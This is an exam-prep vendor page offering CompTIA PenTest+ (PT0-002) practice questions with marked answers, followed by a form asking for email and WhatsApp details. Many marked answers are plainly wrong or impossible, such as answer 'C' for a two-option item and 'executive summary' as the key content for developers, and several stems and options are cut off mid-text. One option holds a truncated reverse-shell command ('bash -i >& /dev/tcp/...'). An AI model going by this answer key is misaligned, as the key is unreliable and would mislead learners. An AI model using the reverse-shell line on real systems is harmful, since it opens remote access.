DON'T WANT TO MISS A THING?

Certification Exam Passing Tips

Latest exam news and discount info

Curated and up-to-date by our experts

Yes, send me the newsletter

Boost Your Certification Prep with CompTIA PT0-002 Mock Tests, CompTIA PenTest+ Certification | SPOTO

Enhance your preparation for the CompTIA PenTest+ (PT0-002) certification with our specialized CompTIA PT0-002 Mock Tests. Practice the latest exam questions to boost your certification prep effectively. Our comprehensive study materials include practice tests, sample questions, exam dumps, and exam questions and answers to ensure thorough preparation. The CompTIA PenTest+ certification is specifically designed for cybersecurity professionals entrusted with penetration testing and vulnerability management responsibilities. Utilize our mock exams and exam simulator for a realistic exam experience, enhancing your confidence and readiness. Access our exam materials and exam answers to reinforce your understanding and mastery of key concepts. With our exam preparation resources and mock tests, you'll be well-equipped to succeed in your PT0-002 exam and earn your CompTIA PenTest+ certification.
Take other online exams

Question #1
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
View answer
Correct Answer: D
Question #2
A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.” Based on the information in the SOW, which of the following behavior
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address
E. Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop
F. Retaining the SOW within the penetration tester’s company for future use so the sales team can planfuture engagements
View answer
Correct Answer: A
Question #3
A penetration tester ran the following command on a staging server: python –m SimpleHTTPServer 9891 Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10
B. powershell –exec bypass –f \\10
C. bash –i >& /dev/tcp/10
D. wget 10
View answer
Correct Answer: B
Question #4
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
View answer
Correct Answer: C
Question #5
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
A. A quick description of the vulnerability and a high-level control to fix it
B. Information regarding the business impact if compromised
C. The executive summary and information regarding the testing company
D. The rules of engagement from the assessment
View answer
Correct Answer: D
Question #6
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. Mastered
B. Not Mastered
View answer
Correct Answer: C
Question #7
After running the enum4linux.pl command, a penetration tester received the following output: Which of the following commands should the penetration tester run NEXT?
A. smbspool //192
B. net rpc share -S 192
C. smbget //192
D. smbclient //192
View answer
Correct Answer: D
Question #8
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare
B. Perform a manual test on the server
C. Check the results on the scanner
D. Look for the vulnerability online
View answer
Correct Answer: D
Question #9
A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?
A. Send an SMS with a spoofed service number including a link to download a malicious application
B. Exploit a vulnerability in the MDM and create a new account and device profile
C. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading
D. Infest a website that is often used by employees with malware targeted toward x86 architectures
View answer
Correct Answer: B
Question #10
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
View answer
Correct Answer: C
Question #11
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?
A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
D. Public data breach dumps
View answer
Correct Answer: C
Question #12
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
A. Stronger algorithmic requirements
B. Access controls on the server
C. Encryption on the user passwords
D. A patch management program
View answer
Correct Answer: D
Question #13
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?
A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction
View answer
Correct Answer: B
Question #14
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
View answer
Correct Answer: AF
Question #15
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
View answer
Correct Answer: C
Question #16
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. protocols are more difficult to understand
D. devices may cause physical world effects
View answer
Correct Answer: B
Question #17
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A. -8 -T0
B. --script "http*vuln*"
C. -sn
D. -O -A
View answer
Correct Answer: C
Question #18
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?
A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures
View answer
Correct Answer: A

View Answers after Submission

Please submit your email and WhatsApp to get the answers of questions.

Note: Please make sure your email ID and Whatsapp are valid so that you can get the correct exam results.

Email:
Whatsapp/phone number: